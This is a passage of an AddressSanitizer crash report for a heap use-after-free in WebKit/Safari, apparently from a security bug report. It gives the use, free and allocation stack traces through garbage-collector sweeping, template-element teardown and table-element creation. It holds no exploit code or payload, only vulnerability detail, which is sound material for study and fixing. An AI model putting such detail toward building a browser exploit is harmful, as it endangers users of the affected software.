#5 0x11e79092f in JSC::FreeList JSC::MarkedBlock::Handle::specializedSweep<true, (JSC::MarkedBlock::Handle::EmptyMode)1, (JSC::MarkedBlock::Handle::SweepMode)1, (JSC::MarkedBlock::Handle::SweepDestructionMode)1, (JSC::MarkedBlock::Handle::ScribbleMode)0, (JSC::MarkedBlock::Handle::NewlyAllocatedMode)1, (JSC::MarkedBlock::Handle::MarksMode)1, JSC::(anonymous namespace)::DestroyFunc>(JSC::MarkedBlock::Handle::EmptyMode, JSC::MarkedBlock::Handle::SweepMode, JSC::MarkedBlock::Handle::SweepDestructionMode, JSC::MarkedBlock::Handle::ScribbleMode, JSC::MarkedBlock::Handle::NewlyAllocatedMode, JSC::MarkedBlock::Handle::MarksMode, JSC::(anonymous namespace)::DestroyFunc const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x12cf92f)
#6 0x11e78f3d2 in JSC::FreeList JSC::MarkedBlock::Handle::finishSweepKnowingSubspace<JSC::(anonymous namespace)::DestroyFunc>(JSC::MarkedBlock::Handle::SweepMode, JSC::(anonymous namespace)::DestroyFunc const&)::'lambda'()::operator()() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x12ce3d2)
#7 0x11e78ebdd in JSC::FreeList JSC::MarkedBlock::Handle::finishSweepKnowingSubspace<JSC::(anonymous namespace)::DestroyFunc>(JSC::MarkedBlock::Handle::SweepMode, JSC::(anonymous namespace)::DestroyFunc const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x12cdbdd)
#8 0x11e78e83c in JSC::JSDestructibleObjectSubspace::finishSweep(JSC::MarkedBlock::Handle&, JSC::MarkedBlock::Handle::SweepMode) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x12cd83c)
#9 0x11ea4de0d in JSC::MarkedBlock::Handle::sweep(JSC::MarkedBlock::Handle::SweepMode) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x158ce0d)
#10 0x11ea48f74 in JSC::MarkedAllocator::tryAllocateIn(JSC::MarkedBlock::Handle*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1587f74)
#11 0x11ea488c9 in JSC::MarkedAllocator::tryAllocateWithoutCollecting() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x15878c9)
#12 0x11ea498da in JSC::MarkedAllocator::allocateSlowCaseImpl(JSC::GCDeferralContext*, bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x15888da)
#13 0x1124f0ac9 in void* JSC::allocateCell<WebCore::JSHTMLDocument>(JSC::Heap&, unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133bac9)
#14 0x1124f0724 in WebCore::JSHTMLDocument::create(JSC::Structure*, WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::HTMLDocument>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133b724)
#15 0x1124f066b in std::__1::enable_if<std::is_same<WebCore::HTMLDocument, WebCore::HTMLDocument>::value, WebCore::JSDOMWrapperConverterTraits<WebCore::HTMLDocument>::WrapperClass*>::type WebCore::createWrapper<WebCore::HTMLDocument, WebCore::HTMLDocument>(WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::HTMLDocument>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133b66b)
#16 0x1124f0439 in std::__1::enable_if<!(std::is_same<WebCore::HTMLDocument, WebCore::Document>::value), WebCore::JSDOMWrapperConverterTraits<WebCore::HTMLDocument>::WrapperClass*>::type WebCore::createWrapper<WebCore::HTMLDocument, WebCore::Document>(WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::Document>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133b439)
#17 0x1124efb1d in WebCore::createNewDocumentWrapper(JSC::ExecState&, WebCore::JSDOMGlobalObject&, WTF::Ref<WebCore::Document>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133ab1d)
#18 0x1124efce8 in WebCore::toJS(JSC::ExecState*, WebCore::JSDOMGlobalObject*, WebCore::Document&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133ace8)
#19 0x112ac88fe in WebCore::createWrapper(JSC::ExecState*, WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::Node>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x19138fe)
#20 0x111f50f6b in WebCore::toJS(JSC::ExecState*, WebCore::JSDOMGlobalObject*, WebCore::Node&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd9bf6b)
#21 0x1126e1040 in WebCore::JSDOMWindowBase::updateDocument() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x152c040)
#22 0x113a707c3 in WebCore::ScriptController::initScript(WebCore::DOMWrapperWorld&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x28bb7c3)
#23 0x10c925476 in WebCore::ScriptController::windowShell(WebCore::DOMWrapperWorld&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x3af476)
#24 0x10c922b08 in WebCore::ScriptController::globalObject(WebCore::DOMWrapperWorld&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x3acb08)
#25 0x10cc39044 in WebKit::WebFrame::jsContextForWorld(WebKit::InjectedBundleScriptWorld*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x6c3044)
#26 0x7fffe41e0ab1 in Safari::WebFeedFinderController::WebFeedFinderController(Safari::WK::BundleFrame const&) (/System/Library/PrivateFrameworks/Safari.framework/Versions/A/Safari:x86_64+0x55cab1)
#27 0x7fffe3d3cb57 in Safari::BrowserBundlePageController::determineWebFeedInformation(Safari::WK::BundleFrame const&) (/System/Library/PrivateFrameworks/Safari.framework/Versions/A/Safari:x86_64+0xb8b57)
#28 0x7fffe3d4a12d in Safari::BrowserBundlePageLoaderClient::didFinishLoadForFrame(Safari::WK::BundlePage const&, Safari::WK::BundleFrame const&, Safari::WK::Type&) (/System/Library/PrivateFrameworks/Safari.framework/Versions/A/Safari:x86_64+0xc612d)
#29 0x7fffe3e235ce in Safari::WK::didFinishLoadForFrame(OpaqueWKBundlePage const*, OpaqueWKBundleFrame const*, void const**, void const*) (/System/Library/PrivateFrameworks/Safari.framework/Versions/A/Safari:x86_64+0x19f5ce)
#30 0x10c72ccb5 in WebKit::InjectedBundlePageLoaderClient::didFinishLoadForFrame(WebKit::WebPage*, WebKit::WebFrame*, WTF::RefPtr<API::Object>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x1b6cb5)
#31 0x10cc439ae in WebKit::WebFrameLoaderClient::dispatchDidFinishLoad() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x6cd9ae)
#32 0x111cd6602 in WebCore::FrameLoader::checkLoadCompleteForThisFrame() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb21602)
#33 0x111cca297 in WebCore::FrameLoader::checkLoadComplete() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb15297)
#34 0x1119a03d1 in WebCore::DocumentLoader::finishedLoading() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x7eb3d1)
#35 0x11142f997 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27a997)
#36 0x1114292aa in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2742aa)
#37 0x113db0c41 in WebCore::SubresourceLoader::didFinishLoading(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2bfbc41)
#38 0x10cfff2eb in WebKit::WebResourceLoader::didFinishResourceLoad(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa892eb)
#39 0x10d002689 in void IPC::handleMessage<Messages::WebResourceLoader::DidFinishResourceLoad, WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)>(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8c689)
#40 0x10d001ba9 in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8bba9)
#41 0x10c8a2683 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x32c683)
#42 0x10c64c3b5 in IPC::Connection::dispatchMessage(std::__1::unique_ptr<IPC::Decoder, std::__1::default_delete<IPC::Decoder> >) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xd63b5)
#43 0x10c655888 in IPC::Connection::dispatchOneMessage() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xdf888)
#44 0x11f0c4312 in WTF::RunLoop::performWork() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c03312)
#45 0x11f0c4d41 in WTF::RunLoop::performWork(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c03d41)
#46 0x7fffd2f753c0 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_SOURCE0_PERFORM_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0xa73c0)
#47 0x7fffd2f562cc in __CFRunLoopDoSources0 (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x882cc)
#48 0x7fffd2f557c5 in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x877c5)
#49 0x7fffd2f551c3 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x871c3)
#50 0x7fffd24b6ebb in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30ebb)
#51 0x7fffd24b6cf0 in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30cf0)
#52 0x7fffd24b6b25 in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30b25)
#53 0x7fffd0a51e23 in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x46e23)
#54 0x7fffd11cd85d in -[NSApplication(NSEvent) _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x7c285d)
#55 0x7fffd0a467aa in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x3b7aa)
#56 0x7fffd0a111dd in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x61dd)
#57 0x7fffe89118c6 in _xpc_objc_main (/usr/lib/system/libxpc.dylib:x86_64+0x108c6)
#58 0x7fffe89102e3 in xpc_main (/usr/lib/system/libxpc.dylib:x86_64+0xf2e3)
#59 0x10c56256c in main (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development:x86_64+0x10000156c)
#60 0x7fffe86b8234 in start (/usr/lib/system/libdyld.dylib:x86_64+0x5234)
0x60c0000b7070 is located 48 bytes inside of 120-byte region [0x60c0000b7040,0x60c0000b70b8)
freed by thread T0 here:
#0 0x10f545294 in __sanitizer_mz_free (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x57294)
#1 0x11f10bf30 in bmalloc::Deallocator::deallocateSlowCase(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c4af30)
#2 0x111564a83 in WebCore::removeDetachedChildrenInContainer(WebCore::ContainerNode&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3afa83)
#3 0x111550892 in WebCore::ContainerNode::~ContainerNode() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x39b892)
#4 0x111fb570d in WebCore::TemplateContentDocumentFragment::~TemplateContentDocumentFragment() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xe0070d)
#5 0x111fb4b99 in WebCore::HTMLTemplateElement::~HTMLTemplateElement() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xdffb99)
#6 0x111fb4c5d in WebCore::HTMLTemplateElement::~HTMLTemplateElement() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xdffc5d)
#7 0x111564a83 in WebCore::removeDetachedChildrenInContainer(WebCore::ContainerNode&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3afa83)
#8 0x111550892 in WebCore::ContainerNode::~ContainerNode() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x39b892)
#9 0x11195296d in WebCore::HTMLUnknownElement::~HTMLUnknownElement() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x79d96d)
#10 0x11e792118 in JSC::FreeList JSC::MarkedBlock::Handle::specializedSweep<true, (JSC::MarkedBlock::Handle::EmptyMode)1, (JSC::MarkedBlock::Handle::SweepMode)1, (JSC::MarkedBlock::Handle::SweepDestructionMode)1, (JSC::MarkedBlock::Handle::ScribbleMode)0, (JSC::MarkedBlock::Handle::NewlyAllocatedMode)1, (JSC::MarkedBlock::Handle::MarksMode)1, JSC::(anonymous namespace)::DestroyFunc>(JSC::MarkedBlock::Handle::EmptyMode, JSC::MarkedBlock::Handle::SweepMode, JSC::MarkedBlock::Handle::SweepDestructionMode, JSC::MarkedBlock::Handle::ScribbleMode, JSC::MarkedBlock::Handle::NewlyAllocatedMode, JSC::MarkedBlock::Handle::MarksMode, JSC::(anonymous namespace)::DestroyFunc const&)::'lambda'(unsigned long)::operator()(unsigned long) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x12d1118)
#11 0x11e79092f in JSC::FreeList JSC::MarkedBlock::Handle::specializedSweep<true, (JSC::MarkedBlock::Handle::EmptyMode)1, (JSC::MarkedBlock::Handle::SweepMode)1, (JSC::MarkedBlock::Handle::SweepDestructionMode)1, (JSC::MarkedBlock::Handle::ScribbleMode)0, (JSC::MarkedBlock::Handle::NewlyAllocatedMode)1, (JSC::MarkedBlock::Handle::MarksMode)1, JSC::(anonymous namespace)::DestroyFunc>(JSC::MarkedBlock::Handle::EmptyMode, JSC::MarkedBlock::Handle::SweepMode, JSC::MarkedBlock::Handle::SweepDestructionMode, JSC::MarkedBlock::Handle::ScribbleMode, JSC::MarkedBlock::Handle::NewlyAllocatedMode, JSC::MarkedBlock::Handle::MarksMode, JSC::(anonymous namespace)::DestroyFunc const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x12cf92f)
#12 0x11e78f3d2 in JSC::FreeList JSC::MarkedBlock::Handle::finishSweepKnowingSubspace<JSC::(anonymous namespace)::DestroyFunc>(JSC::MarkedBlock::Handle::SweepMode, JSC::(anonymous namespace)::DestroyFunc const&)::'lambda'()::operator()() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x12ce3d2)
#13 0x11e78ebdd in JSC::FreeList JSC::MarkedBlock::Handle::finishSweepKnowingSubspace<JSC::(anonymous namespace)::DestroyFunc>(JSC::MarkedBlock::Handle::SweepMode, JSC::(anonymous namespace)::DestroyFunc const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x12cdbdd)
#14 0x11e78e83c in JSC::JSDestructibleObjectSubspace::finishSweep(JSC::MarkedBlock::Handle&, JSC::MarkedBlock::Handle::SweepMode) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x12cd83c)
#15 0x11ea4de0d in JSC::MarkedBlock::Handle::sweep(JSC::MarkedBlock::Handle::SweepMode) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x158ce0d)
#16 0x11ea48f74 in JSC::MarkedAllocator::tryAllocateIn(JSC::MarkedBlock::Handle*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1587f74)
#17 0x11ea488c9 in JSC::MarkedAllocator::tryAllocateWithoutCollecting() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x15878c9)
#18 0x11ea498da in JSC::MarkedAllocator::allocateSlowCaseImpl(JSC::GCDeferralContext*, bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x15888da)
#19 0x1124f0ac9 in void* JSC::allocateCell<WebCore::JSHTMLDocument>(JSC::Heap&, unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133bac9)
#20 0x1124f0724 in WebCore::JSHTMLDocument::create(JSC::Structure*, WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::HTMLDocument>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133b724)
#21 0x1124f066b in std::__1::enable_if<std::is_same<WebCore::HTMLDocument, WebCore::HTMLDocument>::value, WebCore::JSDOMWrapperConverterTraits<WebCore::HTMLDocument>::WrapperClass*>::type WebCore::createWrapper<WebCore::HTMLDocument, WebCore::HTMLDocument>(WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::HTMLDocument>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133b66b)
#22 0x1124f0439 in std::__1::enable_if<!(std::is_same<WebCore::HTMLDocument, WebCore::Document>::value), WebCore::JSDOMWrapperConverterTraits<WebCore::HTMLDocument>::WrapperClass*>::type WebCore::createWrapper<WebCore::HTMLDocument, WebCore::Document>(WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::Document>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133b439)
#23 0x1124efb1d in WebCore::createNewDocumentWrapper(JSC::ExecState&, WebCore::JSDOMGlobalObject&, WTF::Ref<WebCore::Document>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133ab1d)
#24 0x1124efce8 in WebCore::toJS(JSC::ExecState*, WebCore::JSDOMGlobalObject*, WebCore::Document&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x133ace8)
#25 0x112ac88fe in WebCore::createWrapper(JSC::ExecState*, WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::Node>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x19138fe)
#26 0x111f50f6b in WebCore::toJS(JSC::ExecState*, WebCore::JSDOMGlobalObject*, WebCore::Node&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd9bf6b)
#27 0x1126e1040 in WebCore::JSDOMWindowBase::updateDocument() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x152c040)
#28 0x113a707c3 in WebCore::ScriptController::initScript(WebCore::DOMWrapperWorld&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x28bb7c3)
#29 0x10c925476 in WebCore::ScriptController::windowShell(WebCore::DOMWrapperWorld&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x3af476)
previously allocated by thread T0 here:
#0 0x10f544d2c in __sanitizer_mz_malloc (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x56d2c)
#1 0x7fffe883a281 in malloc_zone_malloc (/usr/lib/system/libsystem_malloc.dylib:x86_64+0x2281)
#2 0x11f115ae4 in bmalloc::DebugHeap::malloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c54ae4)
#3 0x11f10ac4d in bmalloc::Allocator::allocateSlowCase(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c49c4d)
#4 0x11f0a0437 in bmalloc::Allocator::allocate(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1bdf437)
#5 0x11f09f768 in WTF::fastMalloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1bde768)
#6 0x1112fce08 in WebCore::Node::operator new(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x147e08)
#7 0x111fa8d3d in WebCore::HTMLTableElement::create(WebCore::QualifiedName const&, WebCore::Document&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xdf3d3d)
#8 0x111ecb5e3 in WebCore::tableConstructor(WebCore::QualifiedName const&, WebCore::Document&, WebCore::HTMLFormElement*, bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd165e3)
#9 0x111ec61a4 in WebCore::HTMLElementFactory::createKnownElement(WTF::AtomicString const&, WebCore::Document&, WebCore::HTMLFormElement*, bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd111a4)
#10 0x111e8aac9 in WebCore::HTMLConstructionSite::createHTMLElementOrFindCustomElementInterface(WebCore::AtomicHTMLToken&, WebCore::JSCustomElementInterface**) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xcd5ac9)
#11 0x111e89e17 in WebCore::HTMLConstructionSite::createHTMLElement(WebCore::AtomicHTMLToken&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xcd4e17)
#12 0x111e8a504 in WebCore::HTMLConstructionSite::insertHTMLElement(WebCore::AtomicHTMLToken&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xcd5504)
#13 0x111feadf4 in WebCore::HTMLTreeBuilder::processStartTagForInBody(WebCore::AtomicHTMLToken&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xe35df4)
#14 0x111fe7a43 in WebCore::HTMLTreeBuilder::processStartTag(WebCore::AtomicHTMLToken&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xe32a43)
#15 0x111fe583e in WebCore::HTMLTreeBuilder::constructTree(WebCore::AtomicHTMLToken&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xe3083e)
#16 0x111eb7bba in WebCore::HTMLDocumentParser::constructTreeFromHTMLToken(WebCore::HTMLTokenizer::TokenPtr&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd02bba)
#17 0x111eb7779 in WebCore::HTMLDocumentParser::pumpTokenizerLoop(WebCore::HTMLDocumentParser::SynchronousMode, bool, WebCore::PumpSession&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd02779)
#18 0x111eb69a6 in WebCore::HTMLDocumentParser::pumpTokenizer(WebCore::HTMLDocumentParser::SynchronousMode) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd019a6)
#19 0x111eb842e in WebCore::HTMLDocumentParser::append(WTF::RefPtr<WTF::StringImpl>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd0342e)
#20 0x1118a5351 in WebCore::DecodedDataDocumentParser::flush(WebCore::DocumentWriter&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x6f0351)
#21 0x1119e103d in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x82c03d)
#22 0x1119a0386 in WebCore::DocumentLoader::finishedLoading() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x7eb386)
#23 0x11142f997 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27a997)
#24 0x1114292aa in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2742aa)
#25 0x113db0c41 in WebCore::SubresourceLoader::didFinishLoading(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2bfbc41)
#26 0x10cfff2eb in WebKit::WebResourceLoader::didFinishResourceLoad(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa892eb)
#27 0x10d002689 in void IPC::handleMessage<Messages::WebResourceLoader::DidFinishResourceLoad, WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)>(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8c689)
#28 0x10d001ba9 in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8bba9)
#29 0x10c8a2683 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x32c683)
